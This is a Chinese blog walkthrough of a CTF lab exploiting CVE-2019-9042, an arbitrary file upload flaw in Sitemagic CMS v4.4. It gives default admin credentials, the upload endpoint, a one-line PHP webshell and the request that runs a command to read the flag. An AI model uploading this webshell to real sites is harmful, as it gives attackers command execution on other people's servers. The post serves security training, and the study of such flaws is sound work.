春秋云镜:CVE-2019-9042(Sitemagic CMS v4.4 任意文件上传漏洞)

最新推荐文章于 2024-11-04 14:45:00 发布
最新推荐文章于 2024-11-04 14:45:00 发布
阅读量825 收藏
点赞数
分类专栏: i春秋 文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65712192/article/details/132444804
版权
文章揭示了SitemagicCMSv4.4中的安全漏洞,攻击者可通过SMFiles上传恶意代码并执行系统命令。提供了一行木马示例system.php,利用路径/files/images/system.php?1=cat///flag可获取flag。
摘要由CSDN通过智能技术生成

一、题目

靶标介绍:

Sitemagic CMS v4.4 index.php?SMExt=SMFiles 存在任意文件上传漏洞,攻击者可上传恶意代码执行系统命令。

 进入题目:

admin/admin

 

/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages

 一句话木马:

system.php

<?php system($_GET[1]);phpinfo();?>

 

 /files/images/system.php?1=cat ///flag

flag{35a77803-ae47-4b5e-a937-d71f263c8a79} 

 

橙子学不会.
关注
专栏目录
KB_VULN3
logan_logan的博客
12-19 313
KIOPTRIX: LEVEL 1.2 (#3) 在浏览器输入IP地址,是一个404网页,接下来开始进行信息收集; 信息收集 2.1 端口扫描。发现存在samba服务,不错哦。 2.2 目录枚举,没有扫到有价值的目录。 2.3 Samba信息枚举 使用enum4linux工具进行枚举,扫描到有一个共享目录/Files和heisenberg用户。 登录samba共享文件夹,存在一个website.zip文件,下载下来之后发现加密,使用fcrackzip破解压缩包密码,得到密码porchm
sudo-cve-2019-18634:CVE-2019-18634的概念证明
03-21
**sudo CVE-2019-18634 概念证明** sudo(Superuser DO)是Linux和Unix系统中的一个命令行工具,允许普通用户以超级用户(root)或其他用户的身份执行命令,通常用于管理系统。这个概念证明是关于CVE-2019-18634...
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-2019-11708诱骗父流程浏览到任意URL。 在过去的中,我已经介绍了CVE-2019-9810的根本原因和利用文章以及相关的。 CVE-2019-11708已由公告,并在Mozilla错误跟踪器中分配了Bug 1559858 。 这是问题的摘要: Insufficient vetting of p
[春秋云镜]CVE-2019-9042
niubi707的博客
12-03 5452
Sitemagic CMS v4.4 index.php?SMExt=SMFiles 存在任意文件上传漏洞,攻击者可上传恶意代码执行系统命令
春秋云境CVE-2019-9042
2303_76653367的博客
05-12 338
SMExt=SMFiles 存在任意文件上传漏洞,攻击者可上传恶意代码执行系统命令。
春秋云镜 CVE-2019-9042
qq_22002773的博客
08-21 225
春秋云镜 CVE-2019-9042
php search file content 漏洞,Web漏洞分析之——顺瓜摸藤
weixin_39900180的博客
03-12 301
阅读:1,358在分析一些漏洞时,能从相关的漏洞预警和描述中获取的情报往往很少。很多时候,只能通过漏洞描述或者补丁中找到漏洞触发点,然而如何利用,如何找到从入口贯通到漏洞触发点的利用链,这时候就需要我们顺瓜摸藤了。有时候,顺着一个瓜(漏洞触发点),还能摸到很多条藤(利用链)。前言近日在PacketStorm看到一个关于国产cmscvehttps://packetstormsecurity.com...
WEB漏洞攻防 - 文件上传漏洞 - CMS类应用场景 - [见文章头]任意文件上传漏洞
易编橙 · 终身成长社群,相遇已是上上签!
09-03 949
思考:在实际应用场景中,常规类的文件上传CMS类的文件上传、编辑器的上传或者CTF比赛中的文件上传应用场景都有不同的差异;总结下来就是,文件上传不管是发现还是利用上都会根据产生层面而不同,常规类无资料的情况下采用常规思路测试,有资料的情况下直接参考资料进行即可。
春秋云镜:CVE-2018-19422(Subrion CMS 4.2.1 存在文件上传漏洞)
m0_65712192的博客
08-23 882
Subrion CMS 4.2.1 存在文件上传漏洞
CVE-2019-12814:CVE-2019-12814
05-26
CVE-2019-12814是一个针对Java Jackson数据绑定库的重大安全漏洞,该漏洞允许攻击者通过恶意构造的JSON输入在解析过程中执行任意代码,从而可能导致系统被完全控制。Jackson是广泛使用的Java库,用于序列化和反序列...
ioc-scanner-CVE-2019-19781:CVE-2019-19781的损害扫描程序指示器
03-12
CVE-2019-19781的损害扫描程序指示器 该存储库包含一个实用程序,用于检测与CVE-2019-19781相关的Citrix ADC设备的威胁。 该实用程序及其资源对FireEye Mandiant调查期间收集到的危害指标进行编码。 要了解更多信息...
CMS Made Simple (CMSMS) 前台SQL注入漏洞 CVE-2019-9053.md
04-08
总结:CMS Made Simple系统的前台SQL注入漏洞CVE-2019-9053是一个严重的信息安全漏洞,攻击者可以利用该漏洞对系统进行非法操作,比如获取管理密码和执行代码。了解此类漏洞的原理和复现方法对于开发者和安全专家都...
2024年三个月自学手册 网络安全(黑客技术)
最新发布
2401_85027336的博客
11-04 1529
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全设备Bypass功能介绍及分析
ztc131450的博客
10-31 1394
一般的应用方法为:在断电的情况下,设备处于Bypass打开状态,然后设备上电后,由于BIOS可以对Bypass作操作,所以在BIOS接管设备后,Bypass仍然处于打开状态,然后OS启动,当OS启动后,一般会执行GPIO 的Bypass程序,将Bypass关闭,这样可以应用程序就可以发挥作用了。以上图为例,如果对GPIO27 的Bit3 写入“0”或“1”,就可以对LAN 1/2 所组成的Bypass进行开关的控制,同理如果操作对象为GPIO 28 ,则可以实现对LAN3/4 Bypass的控制。
网络安全从入门到精通 (第二章-1) Web安全前端基础
ztc131450的博客
11-02 733
1,前端是什么?   网站一般用两部分组成,前端负责展示,后端负责处理请求。
网络安全】|kali中安装nessus
yangdan_jiayou的博客
11-01 452
1、使用 df -h 命令查看磁盘使用情况,确保磁盘容量大于40G//磁盘扩容:https://wiki.bafangwy.com/doc/670/2、安装 nessus安装教程 https://blog.csdn.net/Cairo_A/article/details/139300360使用该安装教程中的(一)(二)(三)步。
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-29 1372
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
什么是护网(HVV)需要什么技术?(内附护网超全资料包)
小司机的奥拓
11-01 1344
护网行动是以公安部牵头的,用以评估企事业单位的网络安全的活动。具体实践中。公安部会组织攻防两方,进攻方会在一个月内对防守方发动网络攻击,检测出防守方(企事业单位)存在的安全漏洞。通过与进攻方的对抗,企事业单位网络、系统以及设备等的安全能力会大大提高。“护网行动”是国家应对网络安全问题所做的重要布局之一。“护网行动”从2016年开始,随着我国对网络安全的重视,涉及单位不断扩大,越来越多的单位都加入到护网行动中,网络安全对抗演练越来越贴近实际情况,各机构对待网络安全需求也从被动构建,升级为业务保障刚需。
2024年第四届“网鼎杯”网络安全大赛-赛前模拟训练
ZXW_NUDT的博客
10-19 9334
2024年第四届“网鼎杯”网络安全大赛-赛前模拟训练
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值